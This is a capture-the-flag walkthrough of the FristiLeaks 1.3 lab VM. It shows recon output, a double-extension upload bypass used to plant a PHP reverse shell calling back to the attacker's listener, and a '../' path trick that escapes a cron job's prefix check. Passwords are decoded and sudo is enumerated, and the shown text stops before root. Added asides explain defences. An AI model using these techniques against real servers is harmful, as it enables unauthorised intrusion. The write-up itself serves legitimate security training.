[VulnHub] FristiLeaks: 1.3

“A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..” – Ar0xA

[note!!] VMware users will need to manually edit the VM’s MAC address to: 08:00:27:A5:A6:76

For more information and the OVA file download, please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.130/24)

Target: FristiLeaks: 1.3 (10.1.1.150/24)

Vulnerability & Exploit

There is no actual vulnerability to exploit here; all you need to take down this VM is enumeration, and more enumeration.

  • Create a customized dictionary list and brute force to find hidden folders
  • Check source code / comments
  • Bypass the Apache PHP upload verification / whitelist filter
  • Sensitive information disclosure
  • Local privilege escalation

Method

  • Scanned the network to discover the target server [arp-scan]
  • Port scanned the target to discover running services and open ports [masscan && nmap]
  • Scanned the web application to dig up more information about the web service [nikto]
  • Created a customized dictionary list based on the web pages [cewl]
  • Fuzzed to find hidden files and paths [wfuzz]
  • Bypassed the whitelist filter to upload a reverse PHP shell
  • Reversed a simple encoding program to decode secret strings and escalate local privileges
  • Enumerated and exploited a misconfigured sudo entry to get ROOT

Tools

All the tools used here can be found in Kali Linux.

Walkthrough

As usual, I used arp-scan to detect the target's IP address.

root@kali:~/fristileaks# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:fd:d1:6b   VMware, Inc.
10.1.1.150    08:00:27:a5:a6:76   CADMUS COMPUTER SYSTEMS
10.1.1.254    00:50:56:e5:d1:58   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.661 seconds (96.20 hosts/sec). 4 responded
root@kali:~/fristileaks#

10.1.1.150 is our Target!

Then I ran masscan to detect open ports on the target (masscan is much faster than nmap for a full port scan, so I use it for the full sweep and then use nmap for a deeper scan of the ports it finds).

# Nmap 6.49BETA5 scan initiated Sun Dec 27 06:52:12 2015 as: nmap -sV -v -A -O -p 80 -oN 10.1.1.150_nmap.txt 10.1.1.150
Nmap scan report for 10.1.1.150
Host is up (0.00041s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: GET HEAD POST OPTIONS TRACE
| Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Uptime guess: 49.708 days (since Sat Nov  7 13:52:17 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 10.1.1.150

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 27 06:52:21 2015 -- 1 IP address (1 host up) scanned in 10.27 seconds

Based on the result, I noticed that there are three folders:

  • /cola
  • /sisi
  • /beer

Also, from the response header Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3, I know the target is running Apache 2.2.15, which is outdated, and the DAV/2 token suggests that WebDAV is enabled.

Meanwhile, I ran nikto to scan for web vulnerabilities.

root@kali:~# nikto -host http://10.1.1.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.150
+ Target Hostname:    10.1.1.150
+ Target Port:        80
+ Start Time:         2015-12-27 06:53:18 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8330 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2015-12-27 06:53:38 (GMT-5) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The result only confirmed what we had found previously; nothing new.

Then I visited the three folders one by one, but kept getting the same image in response:

After trying dirbuster with several default dictionary files and finding nothing, I decided to build a customized wordlist with cewl, containing all the words displayed on the web pages and images.

root@kali:~/fristileaks# cewl -v -d 2 -w cewl_dict_list.txt  http://10.1.1.150/
root@kali:~/fristileaks# cat cewl_dict_list.txt
Ar0xA
meneer
quick
hackme
Welcome
Goal
get
UID
root
and
read
the
special
flag
file
Timeframe
should
doable
hours
The
fristileaks
motto
Fristileaks
2015
are
Fristleaks
barrebas
rikvduijn
wez3forsec
PyroBatNL
0xDUDE
annejanbrouwer
Sander2121
Reinierk
DearCharles
miamat
MisterXE
BasB
Dwight
Egeltje
pdersjant
tcp130x10
spierenburg
ielmatani
renepieters
Mystery
guest
uinix
WhatSecurity
mramsmeets
fristi
drink
keep
calm

Then I used wfuzz to discover any possible hidden path.

root@kali:~/fristileaks# wfuzz -c -z file,cewl_dict_list.txt --hc 404 http://10.1.1.150/FUZZ

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://10.1.1.150/FUZZ
Payload type: file,cewl.txt

Total requests: 54
==================================================================
ID    Response   Lines      Word         Chars          Request
==================================================================

00051:  C=301      7 L         20 W       233 Ch     " - fristi"


root@kali:~/fristileaks#

From the result, one folder was found: fristi.

Visiting the newly found path http://10.1.1.150/fristi/, a login page appeared in my Firefox.

After trying some weak passwords without success, I found some clues in the source code.

First, there is a comment written by eezeepz at the top of the code:

<html>
<head>
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier. 

- by eezeepz
-->
</head>
<body>
<center>
<h1> Welcome to #fristileaks admin portal</h1>
</center>

And another comment, a base64-encoded string, has been inserted at the very bottom of the source code:

<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR U5ErkJggg==
-->

[note!!] Before decoding, we have to join the lines by removing the newlines; tr can be used for that:

root@kali:~/fristileaks# cat test.txt
[the same base64 string as in the HTML comment above, split across many short lines]
root@kali:~/fristileaks# tr -d '\n' < test.txt > base64_decoded.txt
root@kali:~/fristileaks# cat base64_decoded.txt
[the same base64 string, now joined onto a single line]

After decoding it, I got a PNG file:

Putting together all the information collected from this page and its source code, I guessed that the username is eezeepz and the password is keKkeKKeKKeKkEkkEk.

After logging in, I got a link that allows us to upload a file!

But when I tried to upload a .php webshell, I got the following error: only png, jpg and gif are allowed.

To bypass the whitelist check, I appended .jpg to the web shell's file name so that it looks like rsh.php.jpg. This works because Apache's mod_php handler is matched on the .php extension even when another extension follows it, so a filter that only inspects the final extension is not a safe upload check; a safer server-side check validates the whole filename and the file content, and stores uploads outside any directory the web server will execute from.

rsh.php is a PHP reverse shell that connects back to my Kali box on TCP port 5555, so before uploading and triggering it I set up nc to listen on port 5555.

After uploading the reverse PHP shell, I can reach it in the uploads folder at http://10.1.1.150/fristi/uploads/rsh.php.jpg.

Bingo! I got a shell now.

After some enumeration I found database credentials stored in the file /var/www/html/fristi/checklogin.php: the user name is eezeepz and the password is 4ll3maal12#.

<?php

ob_start();
$host="localhost"; // Host name
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select database.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

... truncated ...

My first thought was to log in via SSH with the found username and password, but SSH is not running on the target server.

Then I tried the su command, but it has to be called from a TTY session. Using the trick python -c "import pty; pty.spawn('/bin/bash');" to get a proper TTY, I could try su again with the credentials. It still failed; damn, the password is wrong.

sh-4.1$ python -c "import pty; pty.spawn('/bin/bash');"
python -c "import pty; pty.spawn('/bin/bash');"
bash-4.1$ su eezeepz
su eezeepz
Password: 4ll3maal12#

idsu: incorrect password

So I had to keep digging, and then found a clue file, notes.txt, under /var/www.

sh-4.1$ pwd
/var/www
pwd
sh-4.1$ ls -al
ls -al
total 28
drwxr-xr-x.  6 root root 4096 Nov 17 13:50 .
drwxr-xr-x. 19 root root 4096 Nov 19 01:41 ..
drwxr-xr-x.  2 root root 4096 Aug 24 13:53 cgi-bin
drwxr-xr-x.  3 root root 4096 Nov 17 03:29 error
drwxr-xr-x.  7 root root 4096 Nov 25 04:10 html
drwxr-xr-x.  3 root root 4096 Nov 17 03:37 icons
-rw-r--r--   1 root root   98 Nov 17 13:50 notes.txt
sh-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.

-jerry
sh-4.1$ 

In that file, jerry mentions the home directory of user eezeepz. Following this clue, I checked the /home directory:

sh-4.1$ cd /home
cd /home
sh-4.1$ ls -al
ls -al
total 28
drwxr-xr-x.  5 root      root       4096 Nov 19 01:40 .
dr-xr-xr-x. 22 root      root       4096 Dec 27 17:50 ..
drwx------.  2 admin     admin      4096 Nov 19 02:03 admin
drwx---r-x.  5 eezeepz   eezeepz   12288 Nov 18 15:35 eezeepz
drwx------   2 fristigod fristigod  4096 Nov 19 01:40 fristigod
sh-4.1$

As we can see above, the home folder of eezeepz (drwx---r-x) is readable and executable by everyone.

sh-4.1$ ls -al
ls -al
total 2608
drwx---r-x. 5 eezeepz eezeepz  12288 Nov 18 15:35 .
drwxr-xr-x. 5 root    root      4096 Nov 19 01:40 ..
drwxrwxr-x. 2 eezeepz eezeepz   4096 Nov 17 09:40 .Old
-rw-r--r--. 1 eezeepz eezeepz     18 Sep 22 12:40 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz    176 Sep 22 12:40 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz    124 Sep 22 12:40 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz   4096 Nov 17 09:40 .gnome
drwxrwxr-x. 2 eezeepz eezeepz   4096 Nov 17 09:40 .settings
-rwxr-xr-x. 1 eezeepz eezeepz  24376 Nov 17 09:49 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz  33559 Nov 17 09:49 cbq
-rwxr-xr-x. 1 eezeepz eezeepz   6976 Nov 17 09:49 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz  56720 Nov 17 09:49 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz  25072 Nov 17 09:49 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz  52936 Nov 17 09:48 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz  31800 Nov 17 09:49 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz  48712 Nov 17 09:48 chmod
-rwxr-xr-x. 1 eezeepz eezeepz  53640 Nov 17 09:48 chown
-rwxr-xr-x. 1 eezeepz eezeepz  44528 Nov 17 09:49 clock
-rwxr-xr-x. 1 eezeepz eezeepz   4808 Nov 17 09:49 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17 09:48 cpio
-rwxr-xr-x. 1 eezeepz eezeepz  38608 Nov 17 09:49 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz   5344 Nov 17 09:49 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz  41704 Nov 17 09:48 cut
-rwxr-xr-x. 1 eezeepz eezeepz  14832 Nov 17 09:49 halt
-rwxr-xr-x. 1 eezeepz eezeepz  13712 Nov 17 09:49 hostname
-rwxr-xr-x. 1 eezeepz eezeepz  44528 Nov 17 09:49 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz   7920 Nov 17 09:49 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz  11576 Nov 17 09:49 kill
-rwxr-xr-x. 1 eezeepz eezeepz  16472 Nov 17 09:49 killall5
-rwxr-xr-x. 1 eezeepz eezeepz  32928 Nov 17 09:49 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz  11464 Nov 17 09:49 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17 09:49 nano
-rwxr-xr-x. 1 eezeepz eezeepz   5512 Nov 17 09:49 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17 09:49 netstat
-rwxr-xr-x. 1 eezeepz eezeepz  13892 Nov 17 09:49 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz  25208 Nov 17 09:49 nice
-rwxr-xr-x. 1 eezeepz eezeepz  13712 Nov 17 09:49 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz   4736 Nov 17 09:49 nologin
-r--r--r--. 1 eezeepz eezeepz    514 Nov 18 14:53 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17 09:49 tar
-rwxr-xr-x. 1 eezeepz eezeepz  11352 Nov 17 09:49 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17 09:49 tc
-rwxr-xr-x. 1 eezeepz eezeepz  51536 Nov 17 09:49 telinit
-rwxr-xr-x. 1 eezeepz eezeepz  47928 Nov 17 09:49 touch
-rwxr-xr-x. 1 eezeepz eezeepz  11440 Nov 17 09:49 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz  12304 Nov 17 09:49 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz  21112 Nov 17 09:49 true
-rwxr-xr-x. 1 eezeepz eezeepz  35608 Nov 17 09:49 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz  15410 Nov 17 09:49 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz  12216 Nov 17 09:49 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17 09:49 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz  13712 Nov 17 09:49 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz     62 Nov 17 09:49 zcat
-rwxr-xr-x. 1 eezeepz eezeepz  47520 Nov 17 09:47 zic
sh-4.1$ 

Well, it really is a mess, but we can notice another notes.txt, which should contain more clues.

sh-4.1$ cat notes.txt
cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry
sh-4.1$ 

Looks like I have to break out of the restrictions imposed through runthis. So I created the file runthis under /tmp containing a single command, chmod 777 /home/admin, to change the permissions of /home/admin. After a few seconds of waiting, however, I got an error: command did not start with /home/admin or /usr/bin.

bash-4.1$ cat /tmp/run   
cat /tmp/runthis
chmod 777 /home/admin
bash-4.1$ cat /tmp/cron   
cat /tmp/cronresult
command did not start with /home/admin or /usr/bin

Ok ok… so the command has to start with /home/admin or /usr/bin. The error message suggests the check only looks at how the string starts, so I modified runthis to /home/admin/../../bin/chmod -R 777 /home/admin, a path that passes the prefix test but walks back out of /home/admin with .. before reaching the real chmod. After waiting a few seconds, /home/admin is now fully writable!

bash-4.1$ ls -al /home
ls -al /home
total 28
drwxr-xr-x.  5 root      root       4096 Nov 19 01:40 .
dr-xr-xr-x. 22 root      root       4096 Dec 27 17:50 ..
drwxrwxrwx.  2 admin     admin      4096 Nov 19 02:03 admin
drwx---r-x.  5 eezeepz   eezeepz   12288 Nov 18 15:35 eezeepz
drwx------   2 fristigod fristigod  4096 Nov 19 01:40 fristigod
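The prefix-check bypass above is a classic path-validation bug. As an added illustration (my own code, not the VM's cronjob.py, whose contents the page never shows), the following reconstructs the kind of string-prefix check implied by the cron job's error message, next to a hardened checker that parses the command, requires an absolute binary path, normalises `..` segments before comparing, and requires the binary's parent directory to be exactly an allowed directory. The sample runthis contents are constructed from the lines tried on the page.

```python
import os
import shlex

# Directories the cron job allows binaries from (from notes.txt and the
# error message on the page).
ALLOWED_DIRS = ("/home/admin", "/usr/bin")

# Constructed runthis contents for the demo: the two lines tried on the page,
# a legitimate command, and a normalisation edge case.
SAMPLE_RUNTHIS = """\
chmod 777 /home/admin
/home/admin/../../bin/chmod -R 777 /home/admin
/usr/bin/id
/usr/bin/./id -u
"""


def prefix_check(line):
    """Guessed shape of the VM's check, reconstructed only from its error
    message ("command did not start with /home/admin or /usr/bin"). This is
    NOT the VM's cronjob.py: a plain prefix test on the raw string, which a
    '..' path segment walks straight past."""
    return line.startswith(ALLOWED_DIRS)


def hardened_check(line, allowed_dirs=ALLOWED_DIRS):
    """Return (ok, detail). Parses the line into argv, requires an absolute
    path for the binary, collapses '.', '..' and '//' lexically, and then
    requires the parent directory of the result to be exactly an allowed
    directory. '..' cannot escape because it is resolved before comparing."""
    try:
        argv = shlex.split(line)
    except ValueError as exc:          # unbalanced quotes etc.
        return False, "unparseable command line: %s" % exc
    if not argv:
        return False, "empty command"
    binary = argv[0]
    if not os.path.isabs(binary):
        return False, "binary must be given as an absolute path"
    # normpath is purely lexical; a production check should additionally
    # os.path.realpath() the result so symlinks cannot point elsewhere, and
    # should never allow a directory other users can write to (on the VM,
    # /home/admin ends up world-writable, which defeats any path check).
    resolved = os.path.normpath(binary)
    if os.path.dirname(resolved) not in allowed_dirs:
        return False, "%s resolves outside %s" % (resolved, list(allowed_dirs))
    return True, " ".join([resolved] + argv[1:])


def check_runthis(text, checker=hardened_check):
    """Apply a checker to every non-empty line of a runthis file and return
    a list of (line, ok, detail), the data a cronresult log would record."""
    results = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        outcome = checker(line)
        if isinstance(outcome, tuple):
            ok, detail = outcome
        else:
            ok, detail = outcome, "prefix check"
        results.append((line, ok, detail))
    return results


if __name__ == "__main__":
    for name, checker in (("prefix", prefix_check), ("hardened", hardened_check)):
        print("== %s check ==" % name)
        for line, ok, detail in check_runthis(SAMPLE_RUNTHIS, checker):
            print("%-5s %-48s %s" % ("ALLOW" if ok else "DENY", line, detail))
```

Run stand-alone, the prefix check lets the `/home/admin/../../bin/chmod` line through while the hardened check denies it and still allows the `/usr/bin` commands.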

Going into /home/admin and enumerating, I found three suspicious files: cryptedpass.txt, cryptpass.py and whoisyourgodnow.txt.

bash-4.1$ pwd
pwd
/home/admin
bash-4.1$ ls -al
ls -al
total 652
drwxrwxrwx. 2 admin     admin       4096 Nov 19 02:03 .
drwxr-xr-x. 5 root      root        4096 Nov 19 01:40 ..
-rwxrwxrwx. 1 admin     admin         18 Sep 22 12:40 .bash_logout
-rwxrwxrwx. 1 admin     admin        176 Sep 22 12:40 .bash_profile
-rwxrwxrwx. 1 admin     admin        124 Sep 22 12:40 .bashrc
-rwxrwxrwx  1 admin     admin      45224 Nov 18 13:42 cat
-rwxrwxrwx  1 admin     admin      48712 Nov 18 14:14 chmod
-rwxrwxrwx  1 admin     admin        737 Nov 18 14:48 cronjob.py
-rwxrwxrwx  1 admin     admin         21 Nov 18 15:21 cryptedpass.txt
-rwxrwxrwx  1 admin     admin        258 Nov 18 15:20 cryptpass.py
-rwxrwxrwx  1 admin     admin      90544 Nov 18 13:49 df
-rwxrwxrwx  1 admin     admin      24136 Nov 18 13:40 echo
-rwxrwxrwx  1 admin     admin     163600 Nov 18 13:42 egrep
-rwxrwxrwx  1 admin     admin     163600 Nov 18 13:42 grep
-rwxrwxrwx  1 admin     admin      85304 Nov 18 13:41 ps
-rw-r--r--  1 fristigod fristigod     25 Nov 19 01:47 whoisyourgodnow.txt

The file cryptedpass.txt contains the encoded string mVGZ3O3omkJLmy2pcuTq, and cryptpass.py is the encoding program; its process is:

  • base64-encode the input
  • reverse the string
  • apply rot13 to the reversed string

cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
bash-4.1$ cat cryptpass.py
cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

Using Python (a Python 2 session, since str.decode('rot13') only exists in Python 2), I reversed the steps, decoded the secret string and got the plain text thisisalsopw123.

>>> import base64
>>> cryptedtxt='mVGZ3O3omkJLmy2pcuTq'
>>> base64.b64decode((cryptedtxt.decode('rot13')[::-1]))
'thisisalsopw123'

The same method cracks the secret string in whoisyourgodnow.txt:

>>> cryptedtxt='=RFn0AKnlMHMPIzpyuTI0ITG'
>>> base64.b64decode((cryptedtxt.decode('rot13')[::-1]))
'LetThereBeFristi!'
>>>
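The two decodes above were done in a Python 2 shell. As an added example (my own code, not the VM's cryptpass.py or the author's session), here is the same scheme as a Python 3 encoder/decoder pair: `encode_string` re-implements the three steps of cryptpass.py and `decode_string` undoes them in reverse order, applied to both strings found on the box. Note that the `=` padding at the front of the whoisyourgodnow.txt string is a tell for this scheme: base64 padding survives rot13 unchanged and the reversal moves it to the front.

```python
import base64
import codecs

# The two encoded strings found on the box (taken from the page), by file.
CRYPTED = {
    "cryptedpass.txt": "mVGZ3O3omkJLmy2pcuTq",
    "whoisyourgodnow.txt": "=RFn0AKnlMHMPIzpyuTI0ITG",
}


def encode_string(plaintext):
    """Python 3 re-implementation of cryptpass.py's encodeString:
    base64-encode, reverse, then rot13. Text in, text out."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(crypted):
    """Inverse of encode_string, undoing the steps in reverse order:
    rot13 is its own inverse, reversing is its own inverse, then
    base64-decode. Raises binascii.Error on input not produced by the scheme."""
    b64 = codecs.decode(crypted, "rot13")[::-1]
    return base64.b64decode(b64).decode("utf-8")


def decode_all(crypted=CRYPTED):
    """Decode every entry and return {filename: plaintext}."""
    return {name: decode_string(value) for name, value in crypted.items()}


if __name__ == "__main__":
    for name, plain in decode_all().items():
        print("%-22s -> %s" % (name, plain))
```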

My best guess is that LetThereBeFristi! is the password of the user fristigod … and … yes! I am fristigod now!

bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin  eezeepz    fristigod
bash-4.1$ cd fristigod
cd fristigod
bash-4.1$ ls -al
ls -al
total 20
drwx------  2 fristigod fristigod 4096 Nov 19 01:40 .
drwxr-xr-x. 5 root      root      4096 Nov 19 01:40 ..
-rw-r--r--  1 fristigod fristigod   18 Sep 22 12:40 .bash_logout
-rw-r--r--  1 fristigod fristigod  176 Sep 22 12:40 .bash_profile
-rw-r--r--  1 fristigod fristigod  124 Sep 22 12:40 .bashrc
bash-4.1$ 

After enumeration, I found something interesting:

bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

Checking the file /var/fristigod/.secret_admin_stuff/doCom, I see that this binary is owned by root with the setuid bit set (the s in -rwsr-sr-x), so it runs the given command as ROOT; the sudo entry above lets fristigod run it as the user fristi.

bash-4.1$ ls -al /var/fristigod/.secret_admin_stuff/doCom
ls -al /var/fristigod/.secret_admin_stuff/doCom
-rwsr-sr-x 1 root root 7529 Nov 25 05:53 /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ strings /var/fristigod/.secret_admin_stuff/doCom
strings /var/fristigod/.secret_admin_stuff/doCom
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setuid
exit
strcat
stderr
system
getuid
fwrite
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
Nice try, but wrong user ;)
Usage: ./program_name terminal_command ...
bash-4.1$ 

But when I ran the binary /var/fristigod/.secret_admin_stuff/doCom, I got a wrong user error message :(

bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ /var/fristigod/.secret_admin_stuff/doCom
/var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)
bash-4.1$ 

After further enumeration… I finally found clues in /var/fristigod/.bash_history:

bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
